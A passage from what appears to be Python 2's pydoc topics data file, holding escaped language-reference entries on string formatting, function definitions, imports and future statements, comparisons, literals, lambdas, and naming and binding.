{!s}".format(\'test1\', \'test2\')\n   "repr() shows quotes: \'test1\'; str() doesn\'t: test2"\n\nAligning the text and specifying a width:\n\n   >>> \'{:<30}\'.format(\'left aligned\')\n   \'left aligned                  \'\n   >>> \'{:>30}\'.format(\'right aligned\')\n   \'                 right aligned\'\n   >>> \'{:^30}\'.format(\'centered\')\n   \'           centered           \'\n   >>> \'{:*^30}\'.format(\'centered\')  # use \'*\' as a fill char\n   \'***********centered***********\'\n\nReplacing "%+f", "%-f", and "% f" and specifying a sign:\n\n   >>> \'{:+f}; {:+f}\'.format(3.14, -3.14)  # show it always\n   \'+3.140000; -3.140000\'\n   >>> \'{: f}; {: f}\'.format(3.14, -3.14)  # show a space for positive numbers\n   \' 3.140000; -3.140000\'\n   >>> \'{:-f}; {:-f}\'.format(3.14, -3.14)  # show only the minus -- same as \'{:f}; {:f}\'\n   \'3.140000; -3.140000\'\n\nReplacing "%x" and "%o" and converting the value to different bases:\n\n   >>> # format also supports binary numbers\n   >>> "int: {0:d}; hex: {0:x}; oct: {0:o}; bin: {0:b}".format(42)\n   \'int: 42; hex: 2a; oct: 52; bin: 101010\'\n   >>> # with 0x, 0o, or 0b as prefix:\n   >>> "int: {0:d}; hex: {0:#x}; oct: {0:#o}; bin: {0:#b}".format(42)\n   \'int: 42; hex: 0x2a; oct: 0o52; bin: 0b101010\'\n\nUsing the comma as a thousands separator:\n\n   >>> \'{:,}\'.format(1234567890)\n   \'1,234,567,890\'\n\nExpressing a percentage:\n\n   >>> points = 19.5\n   >>> total = 22\n   >>> \'Correct answers: {:.2%}\'.format(points/total)\n   \'Correct answers: 88.64%\'\n\nUsing type-specific formatting:\n\n   >>> import datetime\n   >>> d = datetime.datetime(2010, 7, 4, 12, 15, 58)\n   >>> \'{:%Y-%m-%d 
%H:%M:%S}\'.format(d)\n \'2010-07-04 12:15:58\'\n\nNesting arguments and more complex examples:\n\n >>> for align, text in zip(\'<^>\', [\'left\', \'center\', \'right\']):\n ... \'{0:{fill}{align}16}\'.format(text, fill=align, align=align)\n ...\n \'left<<<<<<<<<<<<\'\n \'^^^^^center^^^^^\'\n \'>>>>>>>>>>>right\'\n >>>\n >>> octets = [192, 168, 0, 1]\n >>> \'{:02X}{:02X}{:02X}{:02X}\'.format(*octets)\n \'C0A80001\'\n >>> int(_, 16)\n 3232235521\n >>>\n >>> width = 5\n >>> for num in range(5,12):\n ... for base in \'dXob\':\n ... print \'{0:{width}{base}}\'.format(num, base=base, width=width),\n ... print\n ...\n 5 5 5 101\n 6 6 6 110\n 7 7 7 111\n 8 8 10 1000\n 9 9 11 1001\n 10 A 12 1010\n 11 B 13 1011\n', 'function': u'\nFunction definitions\n********************\n\nA function definition defines a user-defined function object (see\nsection The standard type hierarchy):\n\n decorated ::= decorators (classdef | funcdef)\n decorators ::= decorator+\n decorator ::= "@" dotted_name ["(" [argument_list [","]] ")"] NEWLINE\n funcdef ::= "def" funcname "(" [parameter_list] ")" ":" suite\n dotted_name ::= identifier ("." identifier)*\n parameter_list ::= (defparameter ",")*\n ( "*" identifier ["," "**" identifier]\n | "**" identifier\n | defparameter [","] )\n defparameter ::= parameter ["=" expression]\n sublist ::= parameter ("," parameter)* [","]\n parameter ::= identifier | "(" sublist ")"\n funcname ::= identifier\n\nA function definition is an executable statement. Its execution binds\nthe function name in the current local namespace to a function object\n(a wrapper around the executable code for the function). This\nfunction object contains a reference to the current global namespace\nas the global namespace to be used when the function is called.\n\nThe function definition does not execute the function body; this gets\nexecuted only when the function is called. [3]\n\nA function definition may be wrapped by one or more *decorator*\nexpressions. Decorator expressions are evaluated when the function is\ndefined, in the scope that contains the function definition. The\nresult must be a callable, which is invoked with the function object\nas the only argument. The returned value is bound to the function name\ninstead of the function object. Multiple decorators are applied in\nnested fashion. For example, the following code:\n\n @f1(arg)\n @f2\n def func(): pass\n\nis equivalent to:\n\n def func(): pass\n func = f1(arg)(f2(func))\n\nWhen one or more top-level *parameters* have the form *parameter* "="\n*expression*, the function is said to have "default parameter values."\nFor a parameter with a default value, the corresponding *argument* may\nbe omitted from a call, in which case the parameter\'s default value is\nsubstituted. If a parameter has a default value, all following\nparameters must also have a default value --- this is a syntactic\nrestriction that is not expressed by the grammar.\n\n**Default parameter values are evaluated when the function definition\nis executed.** This means that the expression is evaluated once, when\nthe function is defined, and that the same "pre-computed" value is\nused for each call. This is especially important to understand when a\ndefault parameter is a mutable object, such as a list or a dictionary:\nif the function modifies the object (e.g. by appending an item to a\nlist), the default value is in effect modified. This is generally not\nwhat was intended. 
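A short illustration (the function name is invented for the\nexample):\n\n   def append_to(item, seq=[]):\n       seq.append(item)\n       return seq\n\n   >>> append_to(1)\n   [1]\n   >>> append_to(2)   # the same list object is reused\n   [1, 2]\n\n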
A way around this is to use "None" as the\ndefault, and explicitly test for it in the body of the function, e.g.:\n\n   def whats_on_the_telly(penguin=None):\n       if penguin is None:\n           penguin = []\n       penguin.append("property of the zoo")\n       return penguin\n\nFunction call semantics are described in more detail in section Calls.\nA function call always assigns values to all parameters mentioned in\nthe parameter list, either from positional arguments, from keyword\narguments, or from default values. If the form ""*identifier"" is\npresent, it is initialized to a tuple receiving any excess positional\nparameters, defaulting to the empty tuple. If the form\n""**identifier"" is present, it is initialized to a new dictionary\nreceiving any excess keyword arguments, defaulting to a new empty\ndictionary.\n\nIt is also possible to create anonymous functions (functions not bound\nto a name), for immediate use in expressions. This uses lambda\nexpressions, described in section Lambdas. Note that the lambda\nexpression is merely a shorthand for a simplified function definition;\na function defined in a ""def"" statement can be passed around or\nassigned to another name just like a function defined by a lambda\nexpression. The ""def"" form is actually more powerful since it\nallows the execution of multiple statements.\n\n**Programmer\'s note:** Functions are first-class objects. A ""def""\nform executed inside a function definition defines a local function\nthat can be returned or passed around. Free variables used in the\nnested function can access the local variables of the function\ncontaining the def. See section Naming and binding for details.\n', 'global': u'\nThe "global" statement\n**********************\n\n   global_stmt ::= "global" identifier ("," identifier)*\n\nThe "global" statement is a declaration which holds for the entire\ncurrent code block. It means that the listed identifiers are to be\ninterpreted as globals. It would be impossible to assign to a global\nvariable without "global", although free variables may refer to\nglobals without being declared global.\n\nNames listed in a "global" statement must not be used in the same code\nblock textually preceding that "global" statement.\n\nNames listed in a "global" statement must not be defined as formal\nparameters or in a "for" loop control target, "class" definition,\nfunction definition, or "import" statement.\n\n**CPython implementation detail:** The current implementation does not\nenforce the latter two restrictions, but programs should not abuse\nthis freedom, as future implementations may enforce them or silently\nchange the meaning of the program.\n\n**Programmer\'s note:** the "global" statement is a directive to the\nparser. It applies only to code parsed at the same time as the\n"global" statement. In particular, a "global" statement contained in\nan "exec" statement does not affect the code block *containing* the\n"exec" statement, and code contained in an "exec" statement is\nunaffected by "global" statements in the code containing the "exec"\nstatement. The same applies to the "eval()", "execfile()" and\n"compile()" functions.\n', 'id-classes': u'\nReserved classes of identifiers\n*******************************\n\nCertain classes of identifiers (besides keywords) have special\nmeanings. These classes are identified by the patterns of leading and\ntrailing underscore characters:\n\n"_*"\n   Not imported by "from module import *". 
The special identifier "_"\n   is used in the interactive interpreter to store the result of the\n   last evaluation; it is stored in the "__builtin__" module. When\n   not in interactive mode, "_" has no special meaning and is not\n   defined. See section The import statement.\n\n   Note: The name "_" is often used in conjunction with\n     internationalization; refer to the documentation for the\n     "gettext" module for more information on this convention.\n\n"__*__"\n   System-defined names. These names are defined by the interpreter\n   and its implementation (including the standard library). Current\n   system names are discussed in the Special method names section and\n   elsewhere. More will likely be defined in future versions of\n   Python. *Any* use of "__*__" names, in any context, that does not\n   follow explicitly documented use, is subject to breakage without\n   warning.\n\n"__*"\n   Class-private names. Names in this category, when used within the\n   context of a class definition, are re-written to use a mangled form\n   to help avoid name clashes between "private" attributes of base and\n   derived classes. See section Identifiers (Names).\n', 'identifiers': u'\nIdentifiers and keywords\n************************\n\nIdentifiers (also referred to as *names*) are described by the\nfollowing lexical definitions:\n\n   identifier ::= (letter|"_") (letter | digit | "_")*\n   letter     ::= lowercase | uppercase\n   lowercase  ::= "a"..."z"\n   uppercase  ::= "A"..."Z"\n   digit      ::= "0"..."9"\n\nIdentifiers are unlimited in length. Case is significant.\n\n\nKeywords\n========\n\nThe following identifiers are used as reserved words, or *keywords* of\nthe language, and cannot be used as ordinary identifiers. They must\nbe spelled exactly as written here:\n\n   and       del       from      not       while\n   as        elif      global    or        with\n   assert    else      if        pass      yield\n   break     except    import    print\n   class     exec      in        raise\n   continue  finally   is        return\n   def       for       lambda    try\n\nChanged in version 2.4: "None" became a constant and is now recognized\nby the compiler as a name for the built-in object "None". Although it\nis not a keyword, you cannot assign a different object to it.\n\nChanged in version 2.5: Using "as" and "with" as identifiers triggers\na warning. To use them as keywords, enable the "with_statement"\nfuture feature.\n\nChanged in version 2.6: "as" and "with" are full keywords.\n\n\nReserved classes of identifiers\n===============================\n\nCertain classes of identifiers (besides keywords) have special\nmeanings. These classes are identified by the patterns of leading and\ntrailing underscore characters:\n\n"_*"\n   Not imported by "from module import *". The special identifier "_"\n   is used in the interactive interpreter to store the result of the\n   last evaluation; it is stored in the "__builtin__" module. When\n   not in interactive mode, "_" has no special meaning and is not\n   defined. See section The import statement.\n\n   Note: The name "_" is often used in conjunction with\n     internationalization; refer to the documentation for the\n     "gettext" module for more information on this convention.\n\n"__*__"\n   System-defined names. These names are defined by the interpreter\n   and its implementation (including the standard library). Current\n   system names are discussed in the Special method names section and\n   elsewhere. More will likely be defined in future versions of\n   Python. *Any* use of "__*__" names, in any context, that does not\n   follow explicitly documented use, is subject to breakage without\n   warning.\n\n"__*"\n   Class-private names. 
Names in this category, when used within the\n context of a class definition, are re-written to use a mangled form\n to help avoid name clashes between "private" attributes of base and\n derived classes. See section Identifiers (Names).\n', 'if': u'\nThe "if" statement\n******************\n\nThe "if" statement is used for conditional execution:\n\n if_stmt ::= "if" expression ":" suite\n ( "elif" expression ":" suite )*\n ["else" ":" suite]\n\nIt selects exactly one of the suites by evaluating the expressions one\nby one until one is found to be true (see section Boolean operations\nfor the definition of true and false); then that suite is executed\n(and no other part of the "if" statement is executed or evaluated).\nIf all expressions are false, the suite of the "else" clause, if\npresent, is executed.\n', 'imaginary': u'\nImaginary literals\n******************\n\nImaginary literals are described by the following lexical definitions:\n\n imagnumber ::= (floatnumber | intpart) ("j" | "J")\n\nAn imaginary literal yields a complex number with a real part of 0.0.\nComplex numbers are represented as a pair of floating point numbers\nand have the same restrictions on their range. To create a complex\nnumber with a nonzero real part, add a floating point number to it,\ne.g., "(3+4j)". Some examples of imaginary literals:\n\n 3.14j 10.j 10j .001j 1e100j 3.14e-10j\n', 'import': u'\nThe "import" statement\n**********************\n\n import_stmt ::= "import" module ["as" name] ( "," module ["as" name] )*\n | "from" relative_module "import" identifier ["as" name]\n ( "," identifier ["as" name] )*\n | "from" relative_module "import" "(" identifier ["as" name]\n ( "," identifier ["as" name] )* [","] ")"\n | "from" module "import" "*"\n module ::= (identifier ".")* identifier\n relative_module ::= "."* module | "."+\n name ::= identifier\n\nImport statements are executed in two steps: (1) find a module, and\ninitialize it if necessary; (2) define a name or names in the local\nnamespace (of the scope where the "import" statement occurs). The\nstatement comes in two forms differing on whether it uses the "from"\nkeyword. The first form (without "from") repeats these steps for each\nidentifier in the list. The form with "from" performs step (1) once,\nand then performs step (2) repeatedly.\n\nTo understand how step (1) occurs, one must first understand how\nPython handles hierarchical naming of modules. To help organize\nmodules and provide a hierarchy in naming, Python has a concept of\npackages. A package can contain other packages and modules while\nmodules cannot contain other modules or packages. From a file system\nperspective, packages are directories and modules are files.\n\nOnce the name of the module is known (unless otherwise specified, the\nterm "module" will refer to both packages and modules), searching for\nthe module or package can begin. The first place checked is\n"sys.modules", the cache of all modules that have been imported\npreviously. If the module is found there then it is used in step (2)\nof import.\n\nIf the module is not found in the cache, then "sys.meta_path" is\nsearched (the specification for "sys.meta_path" can be found in **PEP\n302**). The object is a list of *finder* objects which are queried in\norder as to whether they know how to load the module by calling their\n"find_module()" method with the name of the module. 
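As a rough sketch (the\nclass name is invented for the example), a minimal finder placed on\n"sys.meta_path" only needs that one method:\n\n   import sys\n\n   class NoisyFinder(object):\n       def find_module(self, fullname, path=None):\n           print \'import requested:\', fullname\n           return None    # decline, so the next finder is tried\n\n   sys.meta_path.append(NoisyFinder())\n\n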
If the module\nhappens to be contained within a package (as denoted by the existence\nof a dot in the name), then a second argument to "find_module()" is\ngiven as the value of the "__path__" attribute from the parent package\n(everything up to the last dot in the name of the module being\nimported). If a finder can find the module it returns a *loader*\n(discussed later) or returns "None".\n\nIf none of the finders on "sys.meta_path" are able to find the module\nthen some implicitly defined finders are queried. Implementations of\nPython vary in what implicit meta path finders are defined. The one\nthey all do define, though, is one that handles "sys.path_hooks",\n"sys.path_importer_cache", and "sys.path".\n\nThe implicit finder searches for the requested module in the "paths"\nspecified in one of two places ("paths" do not have to be file system\npaths). If the module being imported is supposed to be contained\nwithin a package then the second argument passed to "find_module()",\n"__path__" on the parent package, is used as the source of paths. If\nthe module is not contained in a package then "sys.path" is used as\nthe source of paths.\n\nOnce the source of paths is chosen it is iterated over to find a\nfinder that can handle that path. The dict at\n"sys.path_importer_cache" caches finders for paths and is checked for\na finder. If the path does not have a finder cached then\n"sys.path_hooks" is searched by calling each object in the list with a\nsingle argument of the path, returning a finder or raising\n"ImportError". If a finder is returned then it is cached in\n"sys.path_importer_cache" and then used for that path entry. If no\nfinder can be found but the path exists then a value of "None" is\nstored in "sys.path_importer_cache" to signify that an implicit, file-\nbased finder that handles modules stored as individual files should be\nused for that path. If the path does not exist then a finder which\nalways returns "None" is placed in the cache for the path.\n\nIf no finder can find the module then "ImportError" is raised.\nOtherwise some finder returned a loader whose "load_module()" method\nis called with the name of the module to load (see **PEP 302** for the\noriginal definition of loaders). A loader has several responsibilities\nto perform on a module it loads. First, if the module already exists\nin "sys.modules" (a possibility if the loader is called outside of the\nimport machinery) then it is to use that module for initialization and\nnot a new module. But if the module does not exist in "sys.modules"\nthen it is to be added to that dict before initialization begins. If\nan error occurs during loading of the module and it was added to\n"sys.modules" it is to be removed from the dict. If an error occurs\nbut the module was already in "sys.modules" it is left in the dict.\n\nThe loader must set several attributes on the module. "__name__" is to\nbe set to the name of the module. "__file__" is to be the "path" to\nthe file unless the module is built-in (and thus listed in\n"sys.builtin_module_names") in which case the attribute is not set. If\nwhat is being imported is a package then "__path__" is to be set to a\nlist of paths to be searched when looking for modules and packages\ncontained within the package being imported. "__package__" is optional\nbut should be set to the name of the package that contains the module\nor package (the empty string is used for a module not contained in a\npackage). 
"__loader__" is also optional but should be set to the\nloader object that is loading the module.\n\nIf an error occurs during loading then the loader raises "ImportError"\nif some other exception is not already being propagated. Otherwise the\nloader returns the module that was loaded and initialized.\n\nWhen step (1) finishes without raising an exception, step (2) can\nbegin.\n\nThe first form of "import" statement binds the module name in the\nlocal namespace to the module object, and then goes on to import the\nnext identifier, if any. If the module name is followed by "as", the\nname following "as" is used as the local name for the module.\n\nThe "from" form does not bind the module name: it goes through the\nlist of identifiers, looks each one of them up in the module found in\nstep (1), and binds the name in the local namespace to the object thus\nfound. As with the first form of "import", an alternate local name\ncan be supplied by specifying ""as" localname". If a name is not\nfound, "ImportError" is raised. If the list of identifiers is\nreplaced by a star ("\'*\'"), all public names defined in the module are\nbound in the local namespace of the "import" statement..\n\nThe *public names* defined by a module are determined by checking the\nmodule\'s namespace for a variable named "__all__"; if defined, it must\nbe a sequence of strings which are names defined or imported by that\nmodule. The names given in "__all__" are all considered public and\nare required to exist. If "__all__" is not defined, the set of public\nnames includes all names found in the module\'s namespace which do not\nbegin with an underscore character ("\'_\'"). "__all__" should contain\nthe entire public API. It is intended to avoid accidentally exporting\nitems that are not part of the API (such as library modules which were\nimported and used within the module).\n\nThe "from" form with "*" may only occur in a module scope. If the\nwild card form of import --- "import *" --- is used in a function and\nthe function contains or is a nested block with free variables, the\ncompiler will raise a "SyntaxError".\n\nWhen specifying what module to import you do not have to specify the\nabsolute name of the module. When a module or package is contained\nwithin another package it is possible to make a relative import within\nthe same top package without having to mention the package name. By\nusing leading dots in the specified module or package after "from" you\ncan specify how high to traverse up the current package hierarchy\nwithout specifying exact names. One leading dot means the current\npackage where the module making the import exists. Two dots means up\none package level. Three dots is up two levels, etc. So if you execute\n"from . import mod" from a module in the "pkg" package then you will\nend up importing "pkg.mod". If you execute "from ..subpkg2 import mod"\nfrom within "pkg.subpkg1" you will import "pkg.subpkg2.mod". The\nspecification for relative imports is contained within **PEP 328**.\n\n"importlib.import_module()" is provided to support applications that\ndetermine which modules need to be loaded dynamically.\n\n\nFuture statements\n=================\n\nA *future statement* is a directive to the compiler that a particular\nmodule should be compiled using syntax or semantics that will be\navailable in a specified future release of Python. The future\nstatement is intended to ease migration to future versions of Python\nthat introduce incompatible changes to the language. 
It allows use of\nthe new features on a per-module basis before the release in which the\nfeature becomes standard.\n\n   future_statement ::= "from" "__future__" "import" feature ["as" name]\n                        ("," feature ["as" name])*\n                        | "from" "__future__" "import" "(" feature ["as" name]\n                        ("," feature ["as" name])* [","] ")"\n   feature ::= identifier\n   name ::= identifier\n\nA future statement must appear near the top of the module. The only\nlines that can appear before a future statement are:\n\n* the module docstring (if any),\n\n* comments,\n\n* blank lines, and\n\n* other future statements.\n\nThe features recognized by Python 2.6 are "unicode_literals",\n"print_function", "absolute_import", "division", "generators",\n"nested_scopes" and "with_statement". "generators", "with_statement",\n"nested_scopes" are redundant in Python version 2.6 and above because\nthey are always enabled.\n\nA future statement is recognized and treated specially at compile\ntime: Changes to the semantics of core constructs are often\nimplemented by generating different code. It may even be the case\nthat a new feature introduces new incompatible syntax (such as a new\nreserved word), in which case the compiler may need to parse the\nmodule differently. Such decisions cannot be pushed off until\nruntime.\n\nFor any given release, the compiler knows which feature names have\nbeen defined, and raises a compile-time error if a future statement\ncontains a feature not known to it.\n\nThe direct runtime semantics are the same as for any import statement:\nthere is a standard module "__future__", described later, and it will\nbe imported in the usual way at the time the future statement is\nexecuted.\n\nThe interesting runtime semantics depend on the specific feature\nenabled by the future statement.\n\nNote that there is nothing special about the statement:\n\n   import __future__ [as name]\n\nThat is not a future statement; it\'s an ordinary import statement with\nno special semantics or syntax restrictions.\n\nCode compiled by an "exec" statement or calls to the built-in\nfunctions "compile()" and "execfile()" that occur in a module "M"\ncontaining a future statement will, by default, use the new syntax or\nsemantics associated with the future statement. This can, starting\nwith Python 2.2, be controlled by optional arguments to "compile()"\n--- see the documentation of that function for details.\n\nA future statement typed at an interactive interpreter prompt will\ntake effect for the rest of the interpreter session. If an\ninterpreter is started with the "-i" option, is passed a script name\nto execute, and the script includes a future statement, it will be in\neffect in the interactive session started after the script is\nexecuted.\n\nSee also:\n\n  **PEP 236** - Back to the __future__\n     The original proposal for the __future__ mechanism.\n', 'in': u'\nComparisons\n***********\n\nUnlike C, all comparison operations in Python have the same priority,\nwhich is lower than that of any arithmetic, shifting or bitwise\noperation. 
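For instance, "x + 1 == 2" is\nparsed as "(x + 1) == 2", never as "x + (1 == 2)":\n\n   >>> x = 1\n   >>> x + 1 == 2\n   True\n\n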
Also unlike C, expressions like "a < b < c" have the\ninterpretation that is conventional in mathematics:\n\n comparison ::= or_expr ( comp_operator or_expr )*\n comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "<>" | "!="\n | "is" ["not"] | ["not"] "in"\n\nComparisons yield boolean values: "True" or "False".\n\nComparisons can be chained arbitrarily, e.g., "x < y <= z" is\nequivalent to "x < y and y <= z", except that "y" is evaluated only\nonce (but in both cases "z" is not evaluated at all when "x < y" is\nfound to be false).\n\nFormally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and *op1*,\n*op2*, ..., *opN* are comparison operators, then "a op1 b op2 c ... y\nopN z" is equivalent to "a op1 b and b op2 c and ... y opN z", except\nthat each expression is evaluated at most once.\n\nNote that "a op1 b op2 c" doesn\'t imply any kind of comparison between\n*a* and *c*, so that, e.g., "x < y > z" is perfectly legal (though\nperhaps not pretty).\n\nThe forms "<>" and "!=" are equivalent; for consistency with C, "!="\nis preferred; where "!=" is mentioned below "<>" is also accepted.\nThe "<>" spelling is considered obsolescent.\n\nThe operators "<", ">", "==", ">=", "<=", and "!=" compare the values\nof two objects. The objects need not have the same type. If both are\nnumbers, they are converted to a common type. Otherwise, objects of\ndifferent types *always* compare unequal, and are ordered consistently\nbut arbitrarily. You can control comparison behavior of objects of\nnon-built-in types by defining a "__cmp__" method or rich comparison\nmethods like "__gt__", described in section Special method names.\n\n(This unusual definition of comparison was used to simplify the\ndefinition of operations like sorting and the "in" and "not in"\noperators. In the future, the comparison rules for objects of\ndifferent types are likely to change.)\n\nComparison of objects of the same type depends on the type:\n\n* Numbers are compared arithmetically.\n\n* Strings are compared lexicographically using the numeric\n equivalents (the result of the built-in function "ord()") of their\n characters. Unicode and 8-bit strings are fully interoperable in\n this behavior. [4]\n\n* Tuples and lists are compared lexicographically using comparison\n of corresponding elements. This means that to compare equal, each\n element must compare equal and the two sequences must be of the same\n type and have the same length.\n\n If not equal, the sequences are ordered the same as their first\n differing elements. For example, "cmp([1,2,x], [1,2,y])" returns\n the same as "cmp(x,y)". If the corresponding element does not\n exist, the shorter sequence is ordered first (for example, "[1,2] <\n [1,2,3]").\n\n* Mappings (dictionaries) compare equal if and only if their sorted\n (key, value) lists compare equal. [5] Outcomes other than equality\n are resolved consistently, but are not otherwise defined. [6]\n\n* Most other objects of built-in types compare unequal unless they\n are the same object; the choice whether one object is considered\n smaller or larger than another one is made arbitrarily but\n consistently within one execution of a program.\n\nThe operators "in" and "not in" test for collection membership. "x in\ns" evaluates to true if *x* is a member of the collection *s*, and\nfalse otherwise. "x not in s" returns the negation of "x in s". 
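For example:\n\n   >>> 3 in [1, 2, 3]\n   True\n   >>> \'d\' not in \'abc\'\n   True\n   >>> \'name\' in {\'name\': \'value\'}   # dictionaries test their keys\n   True\n\n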
The\ncollection membership test has traditionally been bound to sequences;\nan object is a member of a collection if the collection is a sequence\nand contains an element equal to that object. However, it makes sense\nfor many other object types to support membership tests without being\na sequence. In particular, dictionaries (for keys) and sets support\nmembership testing.\n\nFor the list and tuple types, "x in y" is true if and only if there\nexists an index *i* such that "x == y[i]" is true.\n\nFor the Unicode and string types, "x in y" is true if and only if *x*\nis a substring of *y*. An equivalent test is "y.find(x) != -1".\nNote, *x* and *y* need not be the same type; consequently, "u\'ab\' in\n\'abc\'" will return "True". Empty strings are always considered to be a\nsubstring of any other string, so "\'\' in \'abc\'" will return "True".\n\nChanged in version 2.3: Previously, *x* was required to be a string of\nlength "1".\n\nFor user-defined classes which define the "__contains__()" method, "x\nin y" is true if and only if "y.__contains__(x)" is true.\n\nFor user-defined classes which do not define "__contains__()" but do\ndefine "__iter__()", "x in y" is true if some value "z" with "x == z"\nis produced while iterating over "y". If an exception is raised\nduring the iteration, it is as if "in" raised that exception.\n\nLastly, the old-style iteration protocol is tried: if a class defines\n"__getitem__()", "x in y" is true if and only if there is a non-\nnegative integer index *i* such that "x == y[i]", and all lower\ninteger indices do not raise an "IndexError" exception. (If any other\nexception is raised, it is as if "in" raised that exception).\n\nThe operator "not in" is defined to have the inverse true value of\n"in".\n\nThe operators "is" and "is not" test for object identity: "x is y" is\ntrue if and only if *x* and *y* are the same object. "x is not y"\nyields the inverse truth value. [7]\n', 'integers': u'\nInteger and long integer literals\n*********************************\n\nInteger and long integer literals are described by the following\nlexical definitions:\n\n   longinteger    ::= integer ("l" | "L")\n   integer        ::= decimalinteger | octinteger | hexinteger | bininteger\n   decimalinteger ::= nonzerodigit digit* | "0"\n   octinteger     ::= "0" ("o" | "O") octdigit+ | "0" octdigit+\n   hexinteger     ::= "0" ("x" | "X") hexdigit+\n   bininteger     ::= "0" ("b" | "B") bindigit+\n   nonzerodigit   ::= "1"..."9"\n   octdigit       ::= "0"..."7"\n   bindigit       ::= "0" | "1"\n   hexdigit       ::= digit | "a"..."f" | "A"..."F"\n\nAlthough both lower case "\'l\'" and upper case "\'L\'" are allowed as\nsuffix for long integers, it is strongly recommended to always use\n"\'L\'", since the letter "\'l\'" looks too much like the digit "\'1\'".\n\nPlain integer literals that are above the largest representable plain\ninteger (e.g., 2147483647 when using 32-bit arithmetic) are accepted\nas if they were long integers instead. [1] There is no limit for long\ninteger literals apart from what can be stored in available memory.\n\nSome examples of plain integer literals (first row) and long integer\nliterals (second and third rows):\n\n   7     2147483647                        0177\n   3L    79228162514264337593543950336L    0377L   0x100000000L\n         79228162514264337593543950336     0xdeadbeef\n', 'lambda': u'\nLambdas\n*******\n\n   lambda_expr     ::= "lambda" [parameter_list]: expression\n   old_lambda_expr ::= "lambda" [parameter_list]: old_expression\n\nLambda expressions (sometimes called lambda forms) have the same\nsyntactic position as expressions. 
They are a shorthand to create\nanonymous functions; the expression "lambda arguments: expression"\nyields a function object. The unnamed object behaves like a function\nobject defined with\n\n   def name(arguments):\n       return expression\n\nSee section Function definitions for the syntax of parameter lists.\nNote that functions created with lambda expressions cannot contain\nstatements.\n', 'lists': u'\nList displays\n*************\n\nA list display is a possibly empty series of expressions enclosed in\nsquare brackets:\n\n   list_display        ::= "[" [expression_list | list_comprehension] "]"\n   list_comprehension  ::= expression list_for\n   list_for            ::= "for" target_list "in" old_expression_list [list_iter]\n   old_expression_list ::= old_expression [("," old_expression)+ [","]]\n   old_expression      ::= or_test | old_lambda_expr\n   list_iter           ::= list_for | list_if\n   list_if             ::= "if" old_expression [list_iter]\n\nA list display yields a new list object. Its contents are specified\nby providing either a list of expressions or a list comprehension.\nWhen a comma-separated list of expressions is supplied, its elements\nare evaluated from left to right and placed into the list object in\nthat order. When a list comprehension is supplied, it consists of a\nsingle expression followed by at least one "for" clause and zero or\nmore "for" or "if" clauses. In this case, the elements of the new\nlist are those that would be produced by considering each of the "for"\nor "if" clauses a block, nesting from left to right, and evaluating\nthe expression to produce a list element each time the innermost block\nis reached [1].\n', 'naming': u'\nNaming and binding\n******************\n\n*Names* refer to objects. Names are introduced by name binding\noperations. Each occurrence of a name in the program text refers to\nthe *binding* of that name established in the innermost function block\ncontaining the use.\n\nA *block* is a piece of Python program text that is executed as a\nunit. The following are blocks: a module, a function body, and a class\ndefinition. Each command typed interactively is a block. A script\nfile (a file given as standard input to the interpreter or specified\non the interpreter command line as the first argument) is a code\nblock. A script command (a command specified on the interpreter\ncommand line with the \'**-c**\' option) is a code block. The file read\nby the built-in function "execfile()" is a code block. The string\nargument passed to the built-in function "eval()" and to the "exec"\nstatement is a code block. The expression read and evaluated by the\nbuilt-in function "input()" is a code block.\n\nA code block is executed in an *execution frame*. A frame contains\nsome administrative information (used for debugging) and determines\nwhere and how execution continues after the code block\'s execution has\ncompleted.\n\nA *scope* defines the visibility of a name within a block. If a local\nvariable is defined in a block, its scope includes that block. If the\ndefinition occurs in a function block, the scope extends to any blocks\ncontained within the defining one, unless a contained block introduces\na different binding for the name. The scope of names defined in a\nclass block is limited to the class block; it does not extend to the\ncode blocks of methods -- this includes generator expressions since\nthey are implemented using a function scope. 
This means that the\nfollowing will fail:\n\n class A:\n a = 42\n b = list(a + i for i in range(10))\n\nWhen a name is used in a code block, it is resolved using the nearest\nenclosing scope. The set of all such scopes visible to a code block\nis called the block\'s *environment*.\n\nIf a name is bound in a block, it is a local variable of that block.\nIf a name is bound at the module level, it is a global variable. (The\nvariables of the module code block are local and global.) If a\nvariable is used in a code block but not defined there, it is a *free\nvariable*.\n\nWhen a name is not found at all, a "NameError" exception is raised.\nIf the name refers to a local variable that has not been bound, a\n"UnboundLocalError" exception is raised. "UnboundLocalError" is a\nsubclass of "NameError".\n\nThe following constructs bind names: formal parameters to functions,\n"import" statements, class and function definitions (these bind the\nclass or function name in the defining block), and targets that are\nidentifiers if occurring in an assignment, "for" loop header, in the\nsecond position of an "except" clause header or after "as" in a "with"\nstatement. The "import" statement of the form "from ... import *"\nbinds all names defined in the imported module, except those beginning\nwith an underscore. This form may only be used at the module level.\n\nA target occurring in a "del" statement is also considered bound for\nthis purpose (though the actual semantics are to unbind the name). It\nis illegal to unbind a name that is referenced by an enclosing scope;\nthe compiler will report a "SyntaxError".\n\nEach assignment or import statement occurs within a block defined by a\nclass or function definition or at the module level (the top-level\ncode block).\n\nIf a name binding operation occurs anywhere within a code block, all\nuses of the name within the block are treated as references to the\ncurrent block. This can lead to errors when a name is used within a\nblock before it is bound. This rule is subtle. Python lacks\ndeclarations and allows name binding operations to occur anywhere\nwithin a code block. The local variables of a code block can be\ndetermined by scanning the entire text of the block for name binding\noperations.\n\nIf the global statement occurs within a block, all uses of the name\nspecified in the statement refer to the binding of that name in the\ntop-level namespace. Names are resolved in the top-level namespace by\nsearching the global namespace, i.e. the namespace of the module\ncontaining the code block, and the builtins namespace, the namespace\nof the module "__builtin__". The global namespace is searched first.\nIf the name is not found there, the builtins namespace is searched.\nThe global statement must precede all uses of the name.\n\nThe builtins namespace associated with the execution of a code block\nis actually found by looking up the name "__builtins__" in its global\nnamespace; this should be a dictionary or a module (in the latter case\nthe module\'s dictionary is used). By default, when in the "__main__"\nmodule, "__builtins__" is the built-in module "__builtin__" (note: no\n\'s\'); when in any other module, "__builtins__" is an alias for the\ndictionary of the "__builtin__" module itself. "__builtins__" can be\nset to a user-created dictionary to create a weak form of restricted\nexecution.\n\n**CPython implementation detail:** Users should not touch\n"__builtins__"; it is strictly an implementation detail. 
